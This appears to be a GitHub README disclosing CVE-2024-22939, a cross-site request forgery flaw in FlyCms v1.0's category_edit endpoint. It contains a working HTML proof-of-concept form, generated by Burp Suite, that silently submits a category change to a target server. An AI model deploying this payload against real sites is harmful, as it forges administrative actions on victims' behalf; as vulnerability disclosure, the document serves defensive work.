NUDTTAN91 / CVE-2024-22939

CVE-2024-22939

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

target:https://github.com/sunkaifei/FlyCms version: v1.0

FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /system/article/category_edit

image-20240108165756056

Poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.192/system/article/category_edit?id=1&name=%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91123" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



image-20240108165931640

Success:

image-20240108170027562

About

CVE-2024-22939